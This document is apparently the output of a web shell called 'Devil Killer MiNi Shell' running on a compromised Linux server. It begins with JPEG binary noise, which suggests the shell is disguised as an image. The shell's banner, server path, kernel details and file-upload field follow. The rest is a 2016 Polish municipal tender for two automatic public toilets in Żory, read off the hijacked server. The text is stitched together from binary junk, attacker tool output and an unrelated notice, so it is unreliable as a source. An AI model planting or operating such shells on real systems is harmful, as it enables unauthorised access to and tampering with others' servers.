JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160609/78607-N-2016.html

<p class="kh_header"><b>Żory: Dostawa i montaż dwóch automatycznych toalet publicznych w Żorach</b><br>
<b>Numer ogłoszenia: 78607 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż dwóch automatycznych toalet publicznych w Żorach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na 2 zadania:
Zadanie 1 Dostawa i montaż toalety publicznej do Parku Cegielnia przy ul. Folwareckiej w Żorach.
Zadanie 2 Dostawa i montaż toalety publicznej na ul. Bramkową w Żorach.

Zakres dostawy
Zadanie I
Dostawa i montaż toalety publicznej do Parku Cegielnia przy ul. Folwareckiej w Żorach.
Przedmiotem zadania jest dostawa i montaż toalety publicznej w Parku Cegielnia przy ul. Folwareckiej w Żorach. Montaż obejmujący również wykonanie płyty fundamentowej i niezbędnych przyłączy wodno-kanalizacyjnego i elektrycznego odbywać się będzie na podstawie ostatecznej decyzji o pozwoleniu na budowę do uzyskania której niezbędne jest opracowanie dokumentacji projektowej. 

Opis techniczny toalety publicznej: 
1.Toaleta publiczna na rzucie prostokąta lub prostokąta ze ścianami szczytowymi w kształcie łuku (t = min 0,5m) 
2.Wymiary zewnętrzne budynku toalety: długość 5,0m +/- 10 cm, szerokość 2,3 m +/- 10 cm
3.Toaleta publiczna dwustanowiskowa: 
-pierwsze stanowisko przystosowane dla osób niepełnosprawnych wyposażone w muszlę ustępową, umywalkę, przewijak, trzy uchwyty dla niepełnosprawnych (dwa stałe i jeden łamany), podajnik papieru, kosz na śmieci, pojemnik na mydło w płynie, suszarkę do rąk i wieszak, lustro;
-drugie stanowisko (wymiar minimalny pomieszczenia w kształcie prostokąta 1,0 m x 1,5m) wyposażone w muszlę ustępową, umywalkę, podajnik papieru, lustro, kosz na śmieci, pojemnik na mydło w płynie, suszarkę do rąk i pisuar. 
4.Pomieszczenie techniczne - toaleta powinna posiadać osobne, ogrzewane pomieszczenie techniczne (ogrzewanie podłogowe) z oddzielnym wejściem zewnętrznym z dostępem dla serwisu.
5.Ściany zewnętrzne z kompozytu, grubości 12-15 cm, stropodach grubości 12 -15cm. Elewacja zewnętrzna o strukturze drewna (rys. 1), zabezpieczona środkiem anty graffiti.
6.Ściany, stropodach i posadzka muszą spełniać wymagania izolacyjności cieplnej. Współczynnik przenikania ciepła U [W/(m2K)] dla ścian zewnętrznych max 0,25 a dla stropodachu max 0,20. Toaleta musi mieć zapewnioną temperaturę wewnątrz nie niższą niż 160C zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie. 
7.Drzwi stalowe szerokości: min. 90 cm do stanowiska toalety dla osób niepełnosprawnych, 80 cm do drugiego stanowiska. Drzwi do obydwóch stanowisk zintegrowane z elektrycznym panelem wrzutowym (w przypadku awarii możliwość otwarcia ręcznie). Do pomieszczenia technicznego: drzwi stalowe szerokości min. 80 cm. Kolorystyka wszystkich drzwi w kolorze złoty dąb.
8.Stanowisko dla osób niepełnosprawnych musi być dostosowane do wymagań osób poruszających się na wózkach inwalidzkich: 
a)wjazd do toalety bezpośrednio z poziomu terenu, 
b)szerokość wejścia umożliwiająca wjazd wózkiem inwalidzkim szerokości min. 0,9m, 
c)bezpieczne uchwyty dla niepełnosprawnych ze stali nierdzewnej: dwa uchwyty stałe, jeden uchwyt kątowo łamany dł. 85 cm, 
d)umywalka umieszczona na odpowiedniej wysokości wraz z wnęką dla nóg pod umywalką, 
e)wolna przestrzeń wewnątrz pomieszczenia oparta na kole o średnicy min 150 cm, 
f)umieszczenie wszystkich przycisków i urządzeń na wysokościach odpowiadających osobom na wózkach inwalidzkich.
9.Na elewacji toalety w widocznym miejscu winny zostać zainstalowane podświetlane LED piktogramy:
-nad stanowiskiem dostosowanym dla osób niepełnosprawnych: mężczyzny, kobiety, osoby niepełnosprawnej oraz kobiety z dzieckiem.
-nad drugim stanowiskiem: mężczyzny i kobiety.
10.Ogrzewanie podłogowe elektryczne wszystkich pomieszczeń sterowane wbudowanym w pomieszczeniu technicznym termostatem. Podłoga szczelnie wykończona wykładziną antypoślizgową PCV wywiniętą na ściany na wysokość 15 cm.
11.Nadajnik GSM z powiadamianiem za pomocą SMS-ów w przypadku: 
a)alarmu pożarowego, 
b)wezwania pomocy. 
12.Stanowiska toalet (za wyjątkiem pomieszczenia technicznego) wyposażone w:
a)Muszla wisząca ze stali nierdzewnej, bez sedesu z automatycznie uruchamianym spłukiwaniem muszli. Spłuczka zamontowana w pomieszczeniu technicznym. Stanowisko dla osób niepełnosprawnych wyposażone w muszlę o długości 70 cm.
b)Moduł umywalkowy przystosowany dla osób niepełnosprawnych, z wysuniętą umywalką oraz wnęką umieszczoną pod umywalką umożliwiającą podjazd wózkiem osoby niepełnosprawnej. Moduł wyposażony w sensory ruchu umożliwiające bezdotykowe korzystanie z podajnika na mydło, umycia rąk i ich wysuszenie (podawanie mydła i wody bezdotykowo, cyklicznie). 
c)Nierdzewne, nietłukące się lustro.
d)Nierdzewny dozownik papieru toaletowego.
e)Czasowy ogranicznik przebywania w toalecie - z cyfrowym wyświetlaczem upływającego czasu. Po upływie zadanego czasu zamek drzwi się odblokowuje a tym samym zwalnia się dostęp do stanowiska.
f)Automatyczna wentylacja po zakończeniu użycia toalety.
g)Panel wrzutowy na monety z wyświetlaczem z możliwością ustawienia każdej wielkości wrzutowej nominału z informacją o sumie wrzuconych monet do wielkości żądanej lub ustawienia bezpłatnego korzystania. Dostęp do kasetki na monety wyłącznie od strony pomieszczenia technicznego.
h)Wieszak na ubrania.
i)Czujnik temperatury regulujący automatycznie temperaturę wewnątrz pomieszczenia.
j)Graficzne oznaczenie funkcji użytkowych wewnątrz pomieszczenia.
k)Automatyczny odświeżacz powietrza z obsługą z pomieszczenia technicznego.
l)Kosz na śmieci wykonany ze stali nierdzewnej kwasoodpornej z funkcją antypożarową tj. wyposażony w czujnik dymu, tryskacz wody zintegrowany z systemem GSM.
m)Przycisk alarmu (wezwanie pomocy) zintegrowany z systemem GSM. Uruchomienie przycisku spowoduje odblokowanie zamka drzwi wejściowych, uruchomienie syreny zewnętrznej oraz wysłanie komunikatu SMS.
n)Wewnątrz toalety instrukcja użytkowania w 3 językach (polski, niemiecki, angielski).
13.Stanowiska toalet wyposażone w oświetlenie wewnętrzne włączane automatycznie po otwarciu drzwi wejściowych. Pomieszczenie techniczne wyposażone w oświetlenie wewnętrzne włączane włącznikiem ściennym. Pomieszczenie techniczne wyposażone dodatkowo w dwa gniazdka elektryczne serwisowe oraz miejsce poboru wody wraz z końcówką do zmywania podłogi.
14.Wszystkie pomieszczenia wyposażone w oświetlenie awaryjne włączające się 
w przypadku zaniku prądu.
15.Wokół budynku wykonać opaskę szerokości 35 cm z płytek betonowych 35cm 
x 35cm,
16.Wyprowadzić wewnętrzną linię zasilającą do istniejącego złącza kablowego wraz 
z podłączeniem ( długość do 5m)
17.Wykonanie przykanalika z materiału PVC fi 160 SN 4
18.Wykonanie instalacji zimnej wody od studni wodomierzowej do toalety publicznej 
z materiału PE 100 SDR 11 PN 16 DN 32
19.Inwentaryzacja geodezyjna powykonawcza oraz pomiary elektryczne ochronne. 

Zadanie II
Dostawa i montaż toalety publicznej na ul. Bramkową w Żorach.
Przedmiotem zadania jest dostawa i montaż toalety publicznej przy ul. Bramkowej w Żorach. Montaż obejmujący również wykonanie płyty fundamentowej i niezbędnych przyłączy wodno-kanalizacyjnego i elektrycznego odbywać się będzie na podstawie ostatecznej decyzji o pozwoleniu na budowę do uzyskania której niezbędne jest opracowanie dokumentacji projektowej. 
Wykonawca uzyska również decyzję Wojewódzkiego Konserwatora Zabytków, o zezwoleniu na prowadzenie robót przy zabytku ze względu na posadowienie obiektu budowlanego w strefie ochrony konserwatorskiej.

Opis techniczny toalety publicznej: 

1.Toaleta publiczna na rzucie prostokąta 
2.Wymiary zewnętrzne budynku toalety: długość 4,0m +/- 10 cm, szerokość 2,3 m +/- 10 cm
3.Toaleta publiczna dwustanowiskowa: 
-pierwsze stanowisko przystosowane dla osób niepełnosprawnych wyposażone w muszlę ustępową, umywalkę, przewijak trzy uchwyty dla niepełnosprawnych (dwa stałe i jeden łamany), podajnik papieru, kosz na śmieci, pojemnik na mydło w płynie, suszarkę do rąk i wieszak, lustro;
-drugie stanowisko (wymiar minimalny pomieszczenia w kształcie prostokąta 1,0 m x 1,5m) wyposażone w muszlę ustępową, umywalkę, podajnik papieru, lustro, kosz na śmieci, pojemnik na mydło w płynie, suszarkę do rąk i pisuar. 
4.Pomieszczenie techniczne - toaleta powinna posiadać osobne, ogrzewane pomieszczenie techniczne (ogrzewanie podłogowe) z oddzielnym wejściem zewnętrznym z dostępem dla serwisu.
5.Ściany zewnętrzne z kompozytu, grubości 12-15 cm, stropodach grubości 12 -15cm. Elewacja zewnętrzna o strukturze drewna (rys. 1), zabezpieczona środkiem anty graffiti.
6.Ściany, stropodach i posadzka muszą spełniać wymagania izolacyjności cieplnej. Współczynnik przenikania ciepła U [W/(m2K)] dla ścian zewnętrznych max 0,25 a dla stropodachu max 0,20. Toaleta musi mieć zapewnioną temperaturę wewnątrz nie niższą niż 160C zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie. 
7.Stanowisko dla osób niepełnosprawnych musi być dostosowane do wymagań osób poruszających się na wózkach inwalidzkich: 
a)wjazd do toalety bezpośrednio z poziomu terenu, 
b)szerokość wejścia umożliwiająca wjazd wózkiem inwalidzkim szerokości min. 0,9m, 
c)bezpieczne uchwyty dla niepełnosprawnych ze stali nierdzewnej: dwa uchwyt stałe, jeden uchwyt kątowo łamany dł. 85 cm, 
d)umywalka umieszczona na odpowiedniej wysokości wraz z wnęką dla nóg pod umywalką, 
e)wolna przestrzeń wewnątrz pomieszczenia oparta na kole o średnicy min 150 cm, 
f)umieszczenie wszystkich przycisków i urządzeń na wysokościach odpowiadających osobom na wózkach inwalidzkich.
8.Na elewacji toalety w widocznym miejscu winny zostać zainstalowane podświetlane LED piktogramy: nad stanowiskiem dla osób niepełnosprawnych: mężczyzny, kobiety, osoby niepełnosprawnej oraz kobiety z dzieckiem. Nad drugim stanowiskiem: mężczyzny i kobiety.
9.Ogrzewanie podłogowe elektryczne wszystkich pomieszczeń sterowane wbudowanym w pomieszczeniu technicznym termostatem. Podłoga szczelnie wykończona wykładziną antypoślizgową PCV wywiniętą na ściany na wysokość 15 cm.
10.Nadajnik GSM z powiadamianiem za pomocą SMS-ów w przypadku: 
a)alarmu pożarowego, 
b)wezwania pomocy. 
11.Stanowiska toalet (za wyjątkiem pomieszczenia technicznego) wyposażone w:
a)Muszla wisząca ze stali nierdzewnej, bez sedesu z automatycznie uruchamianym spłukiwaniem muszli. Spłuczka zamontowana w pomieszczeniu technicznym. Stanowisko dla osób niepełnosprawnych wyposażone w muszlę o długości 70 cm.
b)Moduł umywalkowy przystosowany dla osób niepełnosprawnych, z wysuniętą umywalką oraz wnęką umieszczoną pod umywalką umożliwiającą podjazd wózkiem osoby niepełnosprawnej. Moduł wyposażony w sensory ruchu umożliwiające bezdotykowe korzystanie z podajnika na mydło, umycia rak i ich wysuszenie (podawanie mydła i wody bezdotykowo, cyklicznie). 
c)Nierdzewne, nietłukące się lustro.
d)Nierdzewny dozownik papieru toaletowego.
e)Czasowy ogranicznik przebywania w toalecie - z cyfrowym wyświetlaczem upływającego czasu. Po upływie zadanego czasu zamek drzwi się odblokowuje a tym samym zwalnia się dostęp do stanowiska.
f)Automatyczna wentylacja po zakończeniu użycia toalety.
g)Panel wrzutowy na monety z wyświetlaczem z możliwością ustawienia każdej wielkości wrzutowej nominału z informacją o sumie wrzuconych monet do wielkości żądanej lub ustawienia bezpłatnego korzystania. Dostęp do kasetki na monety wyłącznie od strony pomieszczenia technicznego.
h)Wieszak na ubrania.
i)Czujnik temperatury regulujący automatycznie temperaturę wewnątrz pomieszczenia.
j)Graficzne oznaczenie funkcji użytkowych wewnątrz pomieszczenia.
k)Automatyczny odświeżacz powietrza z obsługą z pomieszczenia technicznego.
l)Kosz na śmieci wykonany ze stali nierdzewnej kwasoodpornej z funkcją antypożarową tj. wyposażony w czujnik dymu, tryskacz wody zintegrowany z systemem GSM.
m)Przycisk alarmu (wezwanie pomocy) zintegrowany z systemem GSM. Uruchomienie przycisku spowoduje odblokowanie zamka drzwi wejściowych, uruchomienie syreny zewnętrznej oraz wysłanie komunikatu SMS.
n)Wewnątrz toalety instrukcja użytkowania w 3 językach (polski, niemiecki, angielski).
12.Stanowiska toalet wyposażone w oświetlenie wewnętrzne włączane automatycznie po otwarciu drzwi wejściowych. Pomieszczenie techniczne wyposażone w oświetlenie wewnętrzne włączane włącznikiem ściennym. Pomieszczenie techniczne wyposażone dodatkowo w dwa gniazdka elektryczne serwisowe oraz miejsce poboru wody wraz z końcówką do zmywania podłogi.
13.Wszystkie pomieszczenia wyposażone w oświetlenie awaryjne włączające się w przypadku zaniku prądu.
14.Po wykonaniu montażu toalety przywrócić nawierzchnię z kostki brukowej wokół budynku.
15.Wyprowadzić wewnętrzną linię zasilającą do istniejącego złącza kablowego wraz z podłączeniem (długość do 5m)
16.Wykonanie przykanalika z materiału PVC fi 160 SN 4
17.Wykonanie instalacji zimnej wody od studni wodomierzowej do toalety publicznej z materiału PE 100 SDR 11 PN 16 DN 32
18.Inwentaryzacja geodezyjna oraz pomiary elektryczne ochronne. 

Uwaga
1.Do obowiązków Wykonawcy należy rozruch toalet oraz szkolenie wskazanych przez Zamawiającego osób w zakresie obsługi technicznej.
2.Prace należy wykonywać w sposób nienarażający pobliskie drzewa i krzewy na uszkodzenia.
3.Dokumentacja projektowa powinna zostać podpisana przez osobę posiadającą stosowne uprawnienia. 
4.Wykonawca zobowiązany jest powiadomić pisemnie lub mailowo Zamawiającego z min. 3 dniowym wyprzedzeniem o planowanej dostawie toalet. 
5.Mapę do celów projektowych dostarcza Zamawiający.
6.Okres gwarancji na przedmiot zamówienia min. 36 miesięcy
                                   
2) Przedstawione w dokumentacji przetargowej wskazania na urządzenia techniczne   materiały znak towarowy z podaniem producenta oraz wskazania na normy o których mowa w art. 30 ust. 1-3 ustawy pzp, należy traktować jako przykładowe, ze względu na zasady ustawy pzp, a zwłaszcza art. 29 i 30. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania z zachowaniem odpowiednich, równoważnych parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem zamówienia.
Wykonawca jest zobowiązany wykazać w ofercie jakie materiały i urządzenia zostały zmienione i określić jakie materiały i urządzenia w ich miejsce proponuje. 
Ponadto winien wykazać w sposób nie budzący wątpliwości, że wskazane rozwiązania są równoważne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.55.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5.000,00 zł  (słownie: pięć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co jedną dostawę polegającą na dostawie i montażu automatycznej toalety publicznej o wartości nie mniejszej niż 100.000 zł brutto oraz załączy dowody potwierdzające czy dostawa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wskaże osobę, która będzie uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialną za: kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania), wraz z informacjami na temat jej kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą. Wykonawca oświadczy, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2003 r. Nr 207, poz. 2016 ze zmianami).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

